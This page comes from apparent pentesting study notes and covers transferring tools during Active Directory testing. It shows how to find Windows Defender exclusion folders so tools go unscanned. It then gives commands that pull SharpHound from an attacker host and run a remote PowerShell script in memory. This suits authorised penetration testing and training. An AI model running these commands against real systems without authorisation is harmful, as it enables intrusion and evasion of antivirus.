Pentesting and Red Teaming Notes
  • 🖥️Pentesting and Red Teaming Cheatsheet
  • Web Application Pentesting(BlackBox)
    • SQL Injection
    • Blind SQL Injection
    • Path Traversal
    • Attacking Authentication
    • Race Conditions
    • Business Logic Vulnerabilities
    • Command Injections
    • Information disclosure
    • Access Controls
    • File upload Attacks
    • XXE
    • Server Side Request Forgery
    • Api Testing
    • noSQL
    • DOM based vulnerabilities
    • Cross Site scripting
  • Infrastructure Pentesting
    • Windows Privilege Escalation
    • Attacking Active Directory
    • File Transfers and Download
    • Pivoting(Tunneling and Port Forwarding)
    • Linux Privilege Escalation
    • Stealing NTLM hashes
    • Tricks and Tips
  • Active Directory Pentesting
    • powershell theory
    • Methodology
    • domain enumeration
    • File Transfer
    • PowerShell ADModule
    • Local Privilege Escalation
    • PowerView Commands
    • ACLs Descriptions
    • ACLs Abuse
    • ACL
    • Trusts
    • User Hunting
    • group policy
    • Mimikatz
    • BloodHound
    • LateralMovement
    • Kerberoasting
    • defense bypasses
    • Set-SPN
    • ASREProasting
    • Unconstrained Delegation
    • Constrained Delegation
    • Resource Based Constrained Delegation
    • AD CS
    • Persistance
    • Priv Esc Trusts Inside Forest
    • MSSQL Servers
    • Priv Esc Trusts Across Forest
    • Tips And Tricks
    • Service Tickets and Abuses
  • Reconnaissance
    • Web Application Reconnaissance
    • External Reconnaissance
Powered by GitBook
On this page
  1. Active Directory Pentesting

File Transfer

First find the excluded folder from windows defender by doing

Get-MpPreference | Select-Object -ExpandProperty ExclusionPath

  • Suppose C:\AD is excluded from defender then go to that directory and

Invoke-WebRequest -Uri http://tun0-ip:port/SharpHound.exe -OutFile .\SharpHound.exe

OR

wget http://172.16.99.145:8000/SharpHound.exe -O .\SharpHound.exe

OR (Certutil is not working currently)

certutil -urlcache -f -split http://tun0-ip:port/SharpHound.exe -OutFile .\SharpHound.exe

  • We can also directly load powershell scripts in memory using 

IEX(New-Object Net.WebClient).downloadString('http://tun0-ip:port/filename.ps1')

see powershell-theory.md section.

Previousdomain enumerationNextPowerShell ADModule

Last updated 10 months ago